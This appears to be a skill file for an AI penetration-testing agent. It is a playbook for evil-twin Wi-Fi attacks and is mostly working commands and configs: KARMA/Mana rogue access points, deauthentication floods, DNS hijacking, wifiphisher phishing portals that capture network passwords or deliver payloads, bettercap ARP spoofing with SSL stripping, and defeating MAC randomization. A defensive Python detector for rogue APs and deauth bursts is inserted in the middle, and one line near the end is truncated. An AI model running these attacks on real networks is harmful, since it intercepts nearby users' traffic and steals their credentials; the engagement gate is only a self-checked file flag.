evil-twin-karma
Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X.
| name | evil-twin-karma |
| description | Evil-twin rogue AP with KARMA/Mana PNL-probe response, captive-portal credential capture, and post-association MITM for PSK/open networks. Distinct from wpa-enterprise-eap which targets 802.1X. |
| allowed-tools | Bash Read Write |
| metadata | {"subdomain":"wireless","when_to_use":"evil twin, KARMA, Mana, rogue AP, captive portal, hostapd-mana, wifiphisher, airgeddon, PNL, probe response, client coercion, PSK phishing, open network MITM","tags":["evil-twin","karma","mana","rogue-ap","captive-portal","mitm"],"mitre_attack":"T1557, T1556, T1598"} |
RoE hard stop (mirrors the wireless workflow loaded into your system prompt): NEVER bring up an evil-twin AP on public airspace without `permitted_actions: evil_twin` recorded in `plan/roe.json` for this session. Confirm `iw reg get` before any TX. This applies even on `posture=loud`: explicit operator approval is required.

Tools: hostapd-mana, wifiphisher (portal templates), airgeddon (menu-driven alternative), dnsmasq, bettercap.

Prerequisites: `plan/roe.json` must contain `permitted_actions: evil_twin` and valid regulatory TX authorization.

Preferred-Network List (PNL) probe requests reveal SSIDs a device will auto-associate to. Passive harvest before standing up the rogue AP:
```bash
# Capture probe requests (passive, no TX required)
sudo airodump-ng --output-format csv -w /tmp/probes <mon-iface>
# Probe column shows client MAC → SSID pairs

# Or use bettercap's wifi.recon
sudo bettercap -iface <mon-iface> \
  -eval "wifi.recon on; set wifi.show.sort clients desc; ticker on"
# Shows associated clients and their probe history

# KARMA universal: respond to ANY probe with a matching SSID.
# Mana selective: only respond to probes for SSIDs you choose
# (lower noise, avoids responding to enterprise SSIDs that
#  require 802.1X — route those to wpa-enterprise-eap instead).

# Identify high-value targets:
# - Devices probing for open SSIDs (no PSK needed → immediate MITM)
# - Devices probing for PSK SSIDs you already know the passphrase for
# - Devices with MAC randomization disabled (OUI visible in probe SA)
```
```bash
# /tmp/mana.conf — open AP with KARMA/Mana response
# (hostapd-mana's option is spelled enable_mana, not mana_enable)
cat > /tmp/mana.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
enable_mana=1
mana_credout=/tmp/mana_creds.txt
mana_loud=0
EOF
sudo hostapd-mana /tmp/mana.conf

# mana_loud=0 → Mana selective (probe-response-only)
# mana_loud=1 → KARMA universal (respond to all probes)
```
```bash
# For a PSK-matching evil twin (clone of a known WPA2 PSK network):
cat > /tmp/evil_twin_psk.conf << 'EOF'
interface=<iface>
driver=nl80211
ssid=<TARGET_SSID>
hw_mode=g
channel=<CHANNEL>
wpa=2
wpa_passphrase=<KNOWN_PSK>
wpa_key_mgmt=WPA-PSK
rsn_pairwise=CCMP
enable_mana=1
mana_credout=/tmp/mana_creds.txt
EOF
sudo hostapd-mana /tmp/evil_twin_psk.conf
```
```bash
# Deauth clients from the legitimate AP to accelerate association
# with the rogue AP. Requires permitted_actions: deauth_for_handshake_capture.
# Cross-reference deauth-pmf skill for PMF detection first.
sudo aireplay-ng --deauth 5 -a <LEGIT_BSSID> -c <CLIENT_MAC> <mon-iface2>

# Broadcast deauth (loud, posture=loud only):
sudo aireplay-ng --deauth 0 -a <LEGIT_BSSID> <mon-iface2>
# Note: broadcast deauth is blocked by 802.11w/PMF; check PMF state first.
```
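The two rogue-AP configurations and the deauth step above are exactly the events a wireless IDS is built to catch, and knowing what the blue team sees is part of assessing exposure. The following Python is an added example for this page, not code from hostapd-mana, wifiphisher, aireplay-ng or the Decepticon suite. It assumes an inventory of authorized BSSIDs per SSID (the `AUTHORIZED` dict, constructed) and a list of observed management-frame records (`SAMPLE_FRAMES`, constructed to mimic a tshark or airodump-ng export). `find_evil_twins` flags an authorized SSID advertised from an unknown BSSID and notes any security downgrade (an open clone of a PSK network); `find_deauth_bursts` flags a BSSID whose deauth rate in a sliding window exceeds a threshold, which is how the aireplay-ng step shows up on a sensor because the spoofed frames carry the legitimate AP's address.

```python
"""Evil-twin and deauth-burst detection over observed 802.11 management frames.

Added example for this page; not part of hostapd-mana, wifiphisher, aireplay-ng
or the Decepticon suite. The authorized-AP inventory and the frame records are
constructed by hand to mimic what a WIDS sensor, an airodump-ng CSV or a tshark
field export would yield.
"""
from collections import defaultdict
from dataclasses import dataclass
from typing import Dict, List, Optional, Tuple


@dataclass(frozen=True)
class Frame:
    ts: float                 # capture timestamp in seconds
    subtype: str              # "beacon", "probe_resp" or "deauth"
    bssid: str                # BSSID / address the frame claims to come from
    ssid: Optional[str]       # None for deauth frames
    security: Optional[str]   # "OPEN", "WPA2-PSK", "WPA2-EAP", "WPA3-SAE"
    channel: Optional[int]


# Constructed inventory: SSID -> (authorized BSSIDs, expected security type).
AUTHORIZED: Dict[str, Tuple[set, str]] = {
    "CorpWiFi": ({"aa:bb:cc:00:00:01", "aa:bb:cc:00:00:02"}, "WPA2-EAP"),
    "CorpGuest": ({"aa:bb:cc:00:00:03"}, "WPA2-PSK"),
}


def find_evil_twins(frames: List[Frame], authorized=AUTHORIZED) -> List[Tuple[str, str, str]]:
    """Flag beacons/probe responses advertising an authorized SSID from a BSSID not
    in the inventory, or with a security type other than the expected one."""
    alerts, seen = [], set()
    for f in frames:
        if f.subtype not in ("beacon", "probe_resp") or f.ssid not in authorized:
            continue
        legit_bssids, expected = authorized[f.ssid]
        if (f.ssid, f.bssid) in seen:          # one alert per SSID/BSSID pair
            continue
        seen.add((f.ssid, f.bssid))
        if f.bssid in legit_bssids and f.security == expected:
            continue
        reason = "unknown BSSID" if f.bssid not in legit_bssids else "known BSSID"
        if f.security != expected:
            reason += f", security {f.security} vs expected {expected}"
        alerts.append((f.ssid, f.bssid, reason))
    return alerts


def find_deauth_bursts(frames: List[Frame], window: float = 10.0, threshold: int = 5) -> Dict[str, int]:
    """Per claimed source BSSID, find the peak number of deauth frames inside any
    sliding window of `window` seconds; return BSSIDs whose peak reaches `threshold`.
    Spoofed deauths carry the legitimate AP's address, so the burst is attributed to
    the real BSSID; PMF (802.11w) is the mitigation that makes them ineffective."""
    times_by_bssid = defaultdict(list)
    for f in frames:
        if f.subtype == "deauth":
            times_by_bssid[f.bssid].append(f.ts)
    bursts = {}
    for bssid, times in times_by_bssid.items():
        times.sort()
        start, peak = 0, 0
        for end, t in enumerate(times):
            while t - times[start] > window:
                start += 1
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            bursts[bssid] = peak
    return bursts


# Constructed capture: one legitimate guest AP, a PSK clone and an open clone of
# it, an unrelated neighbour, and a deauth burst spoofing the legitimate guest BSSID.
SAMPLE_FRAMES = [
    Frame(0.0, "beacon", "aa:bb:cc:00:00:03", "CorpGuest", "WPA2-PSK", 6),
    Frame(0.1, "beacon", "aa:bb:cc:00:00:01", "CorpWiFi", "WPA2-EAP", 11),
    Frame(0.2, "beacon", "de:ad:be:ef:00:01", "CorpGuest", "WPA2-PSK", 6),
    Frame(0.3, "probe_resp", "de:ad:be:ef:00:02", "CorpGuest", "OPEN", 6),
    Frame(0.4, "beacon", "12:34:56:78:9a:bc", "Neighbor", "WPA2-PSK", 1),
] + [Frame(1.0 + 0.2 * i, "deauth", "aa:bb:cc:00:00:03", None, None, 6) for i in range(6)] + [
    Frame(2.0, "deauth", "aa:bb:cc:00:00:01", None, None, 11),   # single deauth: normal churn
]


def report(frames: List[Frame]) -> Dict[str, object]:
    return {"evil_twins": find_evil_twins(frames), "deauth_bursts": find_deauth_bursts(frames)}


if __name__ == "__main__":
    for name, value in report(SAMPLE_FRAMES).items():
        print(name, value)
```

In a real deployment the `Frame` records would come from a tshark field export over the monitor capture (the `wlan.bssid`, `wlan.ssid` and `wlan.fc.type_subtype` fields map directly onto the dataclass), and the inventory from the site's controller. The PSK clone is only distinguishable by BSSID, which is why BSSID allow-listing rather than SSID matching is the check that matters.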
```bash
# dnsmasq: DHCP server + DNS for clients on the rogue AP
cat > /tmp/dnsmasq.conf << 'EOF'
interface=<iface>
dhcp-range=10.0.0.10,10.0.0.100,255.255.255.0,12h
dhcp-option=3,10.0.0.1
dhcp-option=6,10.0.0.1
address=/#/10.0.0.1
log-queries
EOF
sudo ip addr add 10.0.0.1/24 dev <iface>
sudo ip link set <iface> up
sudo dnsmasq -C /tmp/dnsmasq.conf --no-daemon &
```
```bash
# wifiphisher automated portal attack
sudo wifiphisher \
  --essid "<TARGET_SSID>" \
  --channel <CHANNEL> \
  -p firmware-upgrade \
  --handshake-capture /tmp/wpa2_handshake.pcap

# Built-in portal templates:
#   firmware-upgrade → asks for Wi-Fi PSK to "install firmware"
#   oauth-login      → OAuth/social login credential capture
#   wifi-connect     → generic Wi-Fi reconnect with PSK prompt
#   plugin_update    → browser plugin update (payload delivery)
# Captured credentials are written to wifiphisher's output log.
# For a custom portal: --phishing-pages-directory /path/to/custom/
```
```bash
# Manual transparent MITM with bettercap after a client connects:
sudo bettercap -iface <iface> \
  -eval "
    set http.proxy.sslstrip true;
    set net.sniff.verbose false;
    net.probe on;
    arp.spoof on;
    http.proxy on;
    net.sniff on
  "
# bettercap captures credentials from HTTP/stripped HTTPS sessions.
# Output to /tmp/bettercap_creds.log
```
Modern OSes (Android 10+, iOS 14+, Windows 10+) use randomized MAC addresses for probe requests, which complicates client targeting:
```bash
# De-anonymize via PNL analysis:
# 1. Capture probes over time; filter by sequence number continuity
#    (same device reuses its sequence counter across random MACs).
#    Note: the SSID field is wlan.ssid in current Wireshark/tshark
#    (the old wlan_mgt.ssid name no longer resolves).
tshark -r /tmp/probes-01.cap -Y "wlan.fc.type_subtype == 4" \
  -T fields -e wlan.sa -e wlan.ssid -e wlan.seq 2>/dev/null \
  | sort -k1,1 -k3,3n > /tmp/probe_seqs.txt
# 2. The same device shows incrementing seq nums even with different MACs.
# 3. Once the device associates to your rogue AP, it uses its real MAC
#    (most implementations reset randomization on association).
```
```python
# Portal-captured credential
kg_add_node(
    kind="credential",
    label=f"Captive portal PSK for {ssid}",
    props={
        "key": f"portal-cred::{bssid}::{client_mac}",
        "secret_type": "wpa_psk_phished",
        "ssid": ssid,
        "bssid": bssid,
        "client_mac": client_mac,
        "psk": psk,
        "portal_template": template_name,
        "captured_at": "<iso8601>",
        "source": "wifiphisher-portal",
    },
)

# PNL leak finding
kg_add_node(
    kind="finding",
    label="Client PNL Probe Leakage — Evil-Twin Viable",
    props={
        "key": f"pnl-leak::{client_mac}",
        "severity": "high",
        "exposed_ssids": [<ssid_list>],
        "client_mac": client_mac,
        "remediation": (
            "Enable MAC randomization and disable 'auto-connect' for "
            "saved networks. Use WPA3 with Protected Management Frames "
            "to prevent deauth-driven roaming."
        ),
    },
)
```
--deauth 1) over broadcast where possible.

Related skills:
- wpa-enterprise-eap skill — use instead for 802.1X/MGT targets.
- deauth-pmf skill — PMF detection and targeted deauth mechanics.
- wpa3-sae skill — Path D captive portal for SAE networks.